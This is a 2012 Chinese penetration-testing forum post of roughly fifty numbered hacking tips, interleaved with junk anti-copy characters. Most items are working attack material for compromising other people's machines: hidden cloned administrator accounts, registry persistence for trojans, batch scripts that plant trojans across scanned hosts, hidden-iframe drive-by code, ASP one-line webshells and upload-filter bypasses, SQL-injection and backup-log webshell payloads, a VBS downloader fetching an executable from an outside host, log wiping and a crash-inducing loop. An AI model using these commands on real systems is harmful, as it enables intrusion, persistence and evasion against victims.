中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
8 N" n& R0 b+ k. ~+ o0 }6 Icacls C:\windows\system32 /G hqw20:R
# |1 F4 k, h8 `# p  E: d' v思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
) p& Z" _$ G* o7 |( @& _恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
- @4 W; @" m5 d4 X! J" a3 t
9 t5 A, A' Z+ U, u8 Z$ y! j2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。# c* E+ I+ M2 b" O& ~7 H3 j0 M/ h2 R

4 e9 F8 q0 Q  B1 A4 e  E3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。$ O. s7 h# O- \  {
: w( |  x; T% h8 a# T" P8 \: S2 \
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号7 ?; Y" f3 R9 f. r
3 m: I" S$ ^: P& j6 S
5、利用INF文件来修改注册表
/ f- X3 |( T4 F[Version]1 k2 L! Z, H) Y: W2 I* a
Signature="$CHICAGO$"
4 ^; {$ f8 j+ w2 k* k) f" x[Defaultinstall]9 |1 r- j: f& k7 t0 f
addREG=Ating( b( t2 {! E/ _) v+ t+ ^& u
[Ating]6 @& O7 b1 p' I$ X9 C5 u
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
$ l$ j6 R% C5 l) ?7 |% Z以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; A7 e& L# d! _0 I! B0 c5 Z; R2 Crundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径" u$ R' c. G' h. E  F1 F* q% {$ }* C
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU5 Y9 O* l- Y4 ]% K3 t# j" J- J  H- ?. F2 J
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% A/ [. c$ y' \% }" KHKEY_CURRENT_CONFIG 简写为 HKCC
3 F. T& W! t- S2 _# h0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
5 P" V0 P' f% F; W9 z"1"这里代表是写入或删除注册表键值中的具体数据" s/ J: V  P; F% ^) F

. W. l. J; J$ k2 W3 ~6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
- a* F0 m- s% g1 S多了一步就是在防火墙里添加个端口,然后导出其键值3 o- Z  L: H# i
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]( Q1 j3 L0 N0 {8 _( ]' ]" c
" L% H% o" F, f6 E/ `
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
' Y2 Z& F1 A% M# s1 c. L3 i在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
* F6 E6 L7 E7 W8 e/ |: p7 \: o8 x$ |' m, {: }2 `/ a* ^" e2 P& U7 l
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 C! I) C3 s" T# Y9 y' a8 J3 q$ W, ?2 E( d7 v1 \, f& s6 T
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
" m$ {% n% E1 u1 K. B$ }4 F可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
8 J4 b& O: q) V4 E
' i% y+ d( F2 v5 X10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
5 V9 }" K6 E" Y8 m! t9 H/ I1 F/ N- r1 O, u9 @; z) ~; m' @! v( P
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
4 D& c; k$ R# _  X, D用法:xsniff –pass –hide –log pass.txt
2 r# {( R4 r. o8 R& E9 W) o* r1 x0 Q9 J, t# x& R
12、google搜索的艺术/ S2 @: c: v5 \( r' q
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
( ^; I8 ^3 t. C! w) N或“字符串的语法错误”可以找到很多sql注入漏洞。
* \8 f7 v. J0 y/ c" j9 K
/ ~7 c/ X4 h7 }- h' c7 ?13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。' M% x  @; d! O, Q( ~

5 V% T7 v; b' d0 h1 A" b/ n$ ?' \14、cmd中输入 nc –vv –l –p 1987! E/ H. i6 U: J" W' B3 ?5 E" O
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 N  d. m" O, h$ Y. }8 H9 D
" c  z& Z( l7 x" F4 \$ i% U: C# ~15、制作T++木马,先写个ating.hta文件,内容为
0 ]5 `1 Q8 p" b, ]- e$ {" O; B# q- H<script language="VBScript">' |) {; t: X4 P/ I
set wshshell=createobject ("wscript.shell" )6 W0 O" \5 e' R3 ^
a=wshshell.run("你马的名称",1)
6 n9 b5 x* E0 `/ l8 i( r4 @6 jwindow.close
6 x6 f9 ^8 J2 g3 j</script>
, _$ O0 @' p4 E5 }" s, V$ Z再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 @- V, w. }1 v! ~0 x3 a* d
# j6 U; X0 C/ k# _16、搜索栏里输入
9 C6 Y9 v& `1 J  \3 f* z; ^关键字%'and 1=1 and '%'='
% J  a9 d( V, Y" o& B关键字%'and 1=2 and '%'='
6 ~! p& t+ C. v$ {4 e+ \/ m比较不同处 可以作为注入的特征字符
  J! `6 y7 u0 i1 g* E7 ]' U5 u( a4 E4 n5 I. ~7 Z' n
17、挂马代码<html>2 V5 v- t2 Z% A2 G* ^1 c+ M. n
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>/ _. Z2 }' x+ f2 q6 N) J. b
</html>- q" i7 R# s8 @2 b1 Z

5 J/ _0 W0 {1 [3 ]; l18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,  P5 b1 m& q4 _# `1 S
net localgroup administrators还是可以看出Guest是管理员来。# M* B, F/ F- t( a% a( X

( U5 H0 d, I  j# j+ k/ V8 ^% u19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 M) I8 I# ^& F" w9 @用法: 安装: instsrv.exe 服务名称 路径4 I9 A0 X/ T3 T
卸载: instsrv.exe 服务名称 REMOVE
1 \, Z) H1 _, u$ N. W2 `  h3 h. b9 m4 a( X, e( s

9 y( G9 @* o6 P* W; P# _21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉  v$ E5 u/ Z9 i5 M5 W9 p% C, ^
不能注入时要第一时间想到%5c暴库。+ G- [* M7 W" ^+ Y" U) t

& G% {& I: p* |- D( \6 f! B4 K* f0 D5 c% a22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
' E  J- ^4 H. n' r
/ [9 P3 n* Q; Y  ^23、缺少xp_cmdshell时2 t+ a$ y+ r. z: s" C3 f. {
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 D' v& j- f5 c. O假如恢复不成功,可以尝试直接加用户(针对开3389的)1 P# B/ G* R* P* I1 E3 {5 {" {& Z
declare @o int
& C3 ^; b" u) [5 S7 n1 e6 z( ^$ nexec sp_oacreate 'wscript.shell',@o out
6 w8 s( v! x# K6 |6 [4 _. E/ [, G. J/ vexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员) x# f$ l3 c% w0 i6 O  N5 i
4 E% k3 s( ^) H- \/ g8 e, g' t1 N' d+ l! ?
24.批量种植木马.bat$ T* f3 p" {# u7 ?5 t) P8 ?
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- ]5 m) i5 X6 t: M! G; F# x. `  m) L1 Yfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
: M/ y/ Z' J, n5 `! S8 w扫描地址.txt里每个主机名一行 用\\开头, E5 e+ ~! ^6 q
; p' f4 N0 X* |7 s. d
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。4 I5 H/ I) P( M( a1 r4 B
7 Z4 [0 L' U) i7 r: Y4 Y0 u" A. l
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.% J4 f: w1 N2 e, E% g/ w0 k0 r' X
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下., [. I7 T+ R: a( g7 [2 k0 N
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 C5 c% Q7 c" _- A/ t8 C: O0 w
% ?" G# ^3 K: q' P! a27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP5 M, s+ a4 n2 b
然后用#clear logg和#clear line vty *删除日志
) M. ~+ k! d% ?# u! x/ h* ~9 F) @8 V% Y' h
28、电脑坏了省去重新安装系统的方法$ @% B2 ~% t6 ^' N
纯dos下执行,: V0 `# R( t  o4 [$ ]1 D
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config6 d5 R, B* W$ U% i- D5 T$ g
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config1 K5 S, q( R% w) l1 T/ Q% t
" E# w) p0 M% \5 V- B5 ]  s
29、解决TCP/IP筛选 在注册表里有三处,分别是:
" z* y) A) ]1 y! BHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
& A3 F, B2 T% D: XHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 G; a9 y. L0 t! n# [; WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 ?) z0 e0 G0 f" l' X: i分别用
) z- T$ H- x) j+ w, i0 f# _3 jregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% @& H% Z$ }+ |+ i" h3 j% {6 l5 _
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip+ n  }$ _" B6 z/ F
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ }$ \; M9 F8 h& v0 Y+ _命令来导出注册表项
& N& l2 Y  ?: @$ f3 X1 |; |然后把三个文件里的EnableSecurityFilters"=dword:00000001,3 K8 `2 G0 E" t! Y) _/ r. _! y
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用: s, D; e3 I! Y4 I; z- \1 B
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。; Q3 e  Q' u! q" U( m7 L- Q

2 }% l9 V( e1 [  Q, B2 P30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
# D5 o4 R) D1 d7 e4 G# a1 LSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
) S. V$ s: D% I9 Z1 W
  {$ S3 N$ x) R1 q) ~& o' T" Y# |31、全手工打造开3389工具- T- M* z( K: H" z, \
打开记事本,编辑内容如下:6 E5 @% D) X; I; F& g/ l
echo [Components] > c:\sql
- \  h6 J: F  D& _echo TSEnable = on >> c:\sql. j+ i8 a3 k4 [7 e; Y
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' _/ D, M! p% Q7 b' T
编辑好后存为BAT文件,上传至肉鸡,执行( R# L$ T+ K' n

) V! ?: r8 U& W6 k/ ?8 r32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
3 ^, h  u  \8 e7 m& o- z
' x6 P" D- e% E7 n5 t33、让服务器重启
6 t; j/ v! N& g0 x5 h8 g6 n写个bat死循环:- x1 d; I+ z  i0 i+ ]: i3 ^
@echo off
6 G4 I/ ?2 [7 W7 p& Y:loop1
+ p, _1 U) m2 E* \# @5 E8 zcls
" J: Z  B, N8 G! l# I- F. [; wstart cmd.exe
0 M# |( Z4 H4 g( S- z0 _7 {goto loop1; c7 X( D, g. p9 [1 A  E
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启2 K( {0 M1 d/ K

  s% y0 G, ?5 n1 @/ t# }9 K34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
: t0 ]) p! C+ a% V@echo off
; ~& A) H5 F. D+ }& @* u1 |date /t >c:/3389.txt
$ |2 s9 R# B/ Atime /t >>c:/3389.txt$ @2 T/ u: A8 l% {5 o$ \
attrib +s +h c:/3389.bat
" Q0 n% G0 B+ t5 F0 [3 Zattrib +s +h c:/3389.txt4 U7 R9 D! U  N
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt* ?9 H% u/ S( b+ L7 c% M" ~3 C2 ^0 N
并保存为3389.bat1 a* a6 s9 ]1 o, d* D
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. M. G' f8 A6 ~' f) k  g, n9 X6 l/ ~, J) d
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, V) H& w+ C- u, m6 @start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)& Z& B" I* S: @1 R" v+ M: K/ L0 W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( S2 `) K- P' F0 C$ i* @1 m2 O
8 Q, o. @6 n( a+ @: R, W; A36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件/ _& \) k% R; E, h! L
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
. u/ s1 m( S( F$ _' K$ u. D2 _echo 你的FTP账号 >>c:\1.bat //输入账号( ]- T  e; b; [" X) ]* v
echo 你的FTP密码 >>c:\1.bat //输入密码& ?) c5 o0 O* W6 U& m, b
echo bin >>c:\1.bat //登入$ [. p/ }8 I# p( ^- r! n
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 P4 ^  e" C5 [; cecho bye >>c:\1.bat //退出
5 S+ h  F! y; m* T( g  n9 c然后执行ftp -s:c:\1.bat即可
$ n1 q6 G* O; N* y, X% c# e$ }) ~; v* \# Q5 [5 c4 X6 S
37、修改注册表开3389两法
& |8 l4 w$ y. L% V  B  b1 o(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
  i0 Z& f1 r% n6 L' G7 L$ O7 }echo Windows Registry Editor Version 5.00 >>3389.reg) L% ]% Z5 F9 F4 _* e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg& ]! l! T' j( w+ f
echo "Enabled"="0" >>3389.reg- G5 ]+ S! d3 ~1 a: ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows9 e- |% @7 ~7 x+ X: r' z
NT\CurrentVersion\Winlogon] >>3389.reg+ P  k) ]( p' m1 S5 p) \" C
echo "ShutdownWithoutLogon"="0" >>3389.reg4 n# n* |. Q* j3 H- S8 n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]' o' ]0 j! r' ?6 U* s
>>3389.reg
/ O$ Q' v- w% B, _& E; x0 j# E. Becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg& Q* Q2 a4 |/ Q* A( M( \% j: g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
7 b% N+ U0 ~$ N. ~>>3389.reg6 t8 C4 \+ s) [7 G, f
echo "TSEnabled"=dword:00000001 >>3389.reg, }! z2 F, o2 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg. v9 U3 m$ w/ W9 |3 o( F2 K
echo "Start"=dword:00000002 >>3389.reg
: \  q, G! q: P. o: `% A+ {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]: G5 h; g2 K' I5 {* @" x: b* R
>>3389.reg  B( n- E' x4 Z- {' _
echo "Start"=dword:00000002 >>3389.reg
& y+ d; m2 c$ Becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ I7 h2 J, N* Zecho "Hotkey"="1" >>3389.reg; A( @/ u8 P. c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; Q4 L; {- y0 w5 L0 I
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
' c0 ]: S2 [# D8 J, u* Jecho "PortNumber"=dword:00000D3D >>3389.reg
' r+ w' U) `8 G# L6 w' H9 N; Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# l+ a  w7 a$ R. E( UServer\WinStations\RDP-Tcp] >>3389.reg1 P4 ~' ], Z$ X3 O
echo "PortNumber"=dword:00000D3D >>3389.reg
) J, z; k2 [. _; w' z, d把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
% \# o$ A3 W5 k/ a(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! X7 @1 [# n% S( [7 [. ^7 g因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效, Y% H) z; x4 @. i8 `
(2)winxp和win2003终端开启0 m  l& ~* D2 e
用以下ECHO代码写一个REG文件:& z; D- H% {0 F" O6 z
echo Windows Registry Editor Version 5.00>>3389.reg7 s5 n3 ?% c: n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; i( p5 B& Y7 W2 q+ O) N% B5 XServer]>>3389.reg8 u" S6 C9 G1 f5 g2 W  {; w
echo "fDenyTSConnections"=dword:00000000>>3389.reg# _7 @* m% I1 B5 @2 k7 }1 n$ |+ T. O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ O2 b# ^6 h, D& ]% I- @; Q' yServer\Wds\rdpwd\Tds\tcp]>>3389.reg
1 m( z: q' R$ V8 c. Wecho "PortNumber"=dword:00000d3d>>3389.reg3 e; E+ k6 e( y6 S2 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- n2 T4 y* _! Q" @5 fServer\WinStations\RDP-Tcp]>>3389.reg; O9 J; H0 R- d7 `4 `
echo "PortNumber"=dword:00000d3d>>3389.reg
) g* n9 e5 f- |& y* K* b* B, E然后regedit /s 3389.reg del 3389.reg
$ i; R& o; d- V! eXP下不论开终端还是改终端端口都不需重启
2 a  T# P  Z$ K+ C, V4 D% Q$ k! {+ S; s$ b6 g6 X, \; J
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃% `) L* }5 f" l0 \
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'6 {' L/ `* s# E4 {

( I- h  m5 @+ g. C* O. @2 a39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
0 V. [, |/ _3 P9 [. C(1)数据库文件名应复杂并要有特殊字符
! P( s1 S; L9 ]. D: ?(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
( K2 X0 ?3 g  H将conn.asp文档中的2 N4 O! P6 M7 l4 l4 e: h
DBPath = Server.MapPath("数据库.mdb")3 m" o, _6 Z% h; |; z; g; z8 C' r
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
6 V; R1 u+ Y: B; ~! R9 y& ]2 d. [: W5 C3 j* Y! q6 }! y7 }9 m* g& t7 o
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置& q9 ~2 J( K! e, y4 p7 H3 Z+ u: U! h, ^
(3)不放在WEB目录里
: `3 O! @" T$ w" }* U5 m- c
4 N  x6 }" C1 ^1 L8 z40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉+ |* x) W& Y. Q' f  S
可以写两个bat文件  x+ P6 _$ }2 f! R6 p. M
@echo off
  h  v! k% L. N! O, b: W7 R@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
  Z& ~: k* P' @- v! a0 p# O+ g@del c:\winnt\system32\query.exe
5 s! K0 J) Z( ?0 M8 Z8 Q$ \1 x+ }@del %SYSTEMROOT%\system32\dllcache\query.exe
6 Q3 Y; Q9 t! t@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
2 o5 K" _2 E$ a' q
5 i4 a: P# y# p4 }@echo off6 R9 L& N4 u7 [; F1 ]7 N
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% _% ^1 R) X. a6 i: L
@del c:\winnt\system32\tsadmin.exe* x& I5 [' Q4 k5 h& A7 L
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
9 `( v  i# v0 N- E( z$ e: j9 e1 Q8 n3 T
) T2 @: ^6 q' h1 _' S& I( G41、映射对方盘符0 j: {+ k8 ]$ ~+ O: _
telnet到他的机器上,6 p6 P: v* w* o5 t  j
net share 查看有没有默认共享 如果没有,那么就接着运行
, G. w: m  q2 R8 B6 |% U1 K' Dnet share c$=c:
: T7 x* |$ {% Y) T! L7 {: e  f2 @net share现在有c$7 p1 @, r6 y$ r1 I( q: H* F
在自己的机器上运行/ r" X1 g8 H2 @
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ F5 }9 M& O/ ?# c' h6 `/ p; V
9 G: p  t1 n( x42、一些很有用的老知识
4 V1 ^' f6 G/ _type c:\boot.ini ( 查看系统版本 )
. z6 K# n) h" E1 ~/ o: ^net start (查看已经启动的服务)
  K- e+ f3 r6 _6 ^2 @query user ( 查看当前终端连接 )
2 N7 g: _! D$ Q8 ~& a1 O0 Bnet user ( 查看当前用户 )
8 C6 V; E  r' S% unet user 用户 密码/add ( 建立账号 )8 p% q# q9 k# |5 Q/ ?9 P
net localgroup administrators 用户 /add (提升某用户为管理员)" w* L0 a! D: S" @5 S. Y
ipconfig -all ( 查看IP什么的 ), i" l' i  ~  \% ^4 Y* D8 P$ s- s- Z: f
netstat -an ( 查看当前网络状态 )
& U4 \2 S1 ^3 X/ U2 y0 B+ c' Q5 ffindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码), m+ q; s3 ?2 c2 |
克隆时Administrator对应1F4" X. F  M+ L0 r( Q# @
guest对应1F5
" F' s3 z: Z# u6 d/ {! p2 ztsinternetuser对应3E89 |" Y, N3 E' d' A* x5 Y) m5 H

7 S0 `/ o% y" L( J43、如果对方没开3389,但是装了Remote Administrator Service
9 u, P) R, T- ]; X3 U用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
2 j5 i' Q  z( {$ U3 F. H" i解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% a0 ]8 ?6 |3 c
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"# R1 b9 D; I8 W& v3 a4 O

; E! a8 [+ z3 h9 w4 ^% n44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
5 }2 U, ]0 Z; b% D本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
4 N8 S- N* N5 A5 }; W/ o% Q$ Z6 d1 g3 c; G2 }! n
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)/ N3 g. i! v! q0 j
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open, a; X; Q" t! Q5 m+ C
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
7 h2 ?) T2 n- A8 ~1 c& ]CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =' `3 q8 k  Y: S, r8 z5 M3 r
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
. q7 G5 s$ c8 H0 J(这是完整的一句话,其中没有换行符), P0 F, M; r, W1 K
然后下载:3 P% t/ Q$ N  i6 h: e
cscript down.vbs http://www.hack520.org/hack.exe hack.exe2 i, d) z& I6 ~" [8 A

$ }3 Q' s+ {, [8 C; j4 D( _4 {46、一句话木马成功依赖于两个条件:9 ^) ]+ {6 ?7 ~. ]
1、服务端没有禁止adodb.Stream或FSO组件
! s, C2 `& P; [- W% t) L# W3 _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 n$ [$ K7 c1 z( X- r
  u- P0 ?. \+ v* V. i47、利用DB_OWNER权限进行手工备份一句话木马的代码:
, R9 k$ o1 \$ I. V. c4 Y/ c- i;alter database utsz set RECOVERY FULL--
! J: {% z3 O  ?;create table cmd (a image)--
. o' c- |: e/ g9 u;backup log utsz to disk = 'D:\cmd' with init--: `7 v3 }- a' b8 n
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--4 P4 W, i, h8 }) j7 W8 M
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! L$ q6 Q5 s. N* L, z8 a注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。2 p1 v2 A  I2 ?+ ]! e

! p( X3 i' i% x$ G% D2 d6 b48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 S4 g- b8 m5 D2 p: L( p6 Y" k
2 q% G& \$ @1 i. m
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options9 W& A2 j7 K0 t
所有会话用 'all'。2 i8 k, @* p/ C
-s sessionid 列出会话的信息。0 i$ c% E' G& \* R' I
-k sessionid 终止会话。
$ N- a6 G( Q% o6 _  z# Z/ J-m sessionid 发送消息到会话。$ o( Q7 ^, R/ h; _
( x# K# H. V. Y$ J
config 配置 telnet 服务器参数。& w/ e1 O2 T0 H5 v
3 a) ?+ o9 c. U0 j
common_options 为:
: N' E4 Z9 \# [4 n-u user 指定要使用其凭据的用户
: h  j4 N( @1 E& e, G; A# S-p password 用户密码0 N2 p1 @: {% r6 S+ }( {/ B# |

" g% t8 H( _- [2 X" v9 V1 u% R& ~9 @config_options 为:
3 d2 U' o4 N9 b( Hdom = domain 设定用户的默认域1 A! e, n7 t! W' P6 I
ctrlakeymap = yes|no 设定 ALT 键的映射
: G' {; s2 Q; T6 ?+ o, ftimeout = hh:mm:ss 设定空闲会话超时值4 o; d* C8 d. I: ^4 Z0 G6 O3 ?
timeoutactive = yes|no 启用空闲会话。; }5 }/ d4 b# j2 [6 S0 O
maxfail = attempts 设定断开前失败的登录企图数。  ^. W9 r  k) @' }" Z
maxconn = connections 设定最大连接数。, V* Q1 h) r) O4 d1 Y) h' x# I
port = number 设定 telnet 端口。: p  S$ _. u* Y8 |( ?( v0 \. |. z
sec = [+/-]NTLM [+/-]passwd* r) U, H/ U2 o6 _7 s* ~8 d
设定身份验证机构
+ ~' E8 t6 p6 t, X- `fname = file 指定审计文件名。+ g# X& ~7 s! W+ T" w0 B) f" H
fsize = size 指定审计文件的最大尺寸(MB)。) r9 r* u: p5 [) ^$ |+ c* i2 h
mode = console|stream 指定操作模式。
& a" ?9 f% r8 W4 t6 e1 q: Eauditlocation = eventlog|file|both" w# T) m2 R' L; `* U* }  q" @6 J. k9 v
指定记录地点& L1 I# t( f; W( L, P
audit = [+/-]user [+/-]fail [+/-]admin
$ s: O3 _" Z8 O& _( j/ \2 ~$ s2 X
& m' q" S7 W  g" |6 q) G7 T49、例如:在IE上访问:
5 d2 Z9 o5 f4 Z8 m% y) w5 N* W" Zwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
" R+ Q( M3 k; S3 v9 _" t& I4 \hack.txt里面的代码是:. b% x% N! A( B. {
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
: R* k) i3 S8 E; b把这个hack.txt发到你空间就可以了!
, P4 ?1 P2 [5 P0 h' Z这个可以利用来做网马哦!
! a) M2 ]- I: P/ m: I
* J4 p8 g, k0 Q5 ^( u0 U7 T4 Y' T) j50、autorun的病毒可以通过手动限制!( t/ F! ?9 Q: m7 m8 `! G
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) A( d! b+ `+ O6 h2 I( L5 Y7 b2,打开盘符用右键打开!切忌双击盘符~* p* n* [/ H$ J! R
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!4 r/ e6 w, z; }" S( }

